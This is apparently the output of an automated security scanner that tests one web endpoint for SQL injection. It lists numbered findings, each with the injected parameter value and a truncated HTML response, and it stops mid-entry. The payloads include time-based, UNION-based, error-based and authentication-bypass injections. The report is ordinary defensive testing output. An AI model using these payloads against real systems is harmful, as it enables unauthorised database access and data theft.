vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1703\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1704\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1705\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1706\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1707\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1708\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' AND MID(VERSION(),1,1) = '5';ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1709\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1710Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AS INJECTX WHERE 1=1 AND 1=1\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1711\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 1=1 AND '%'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1712\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),3#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1713\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# \"));waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1714\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1715\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\") or \"1\"=\"1\"--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1716\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1/0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1717\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' and 1=2 --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content 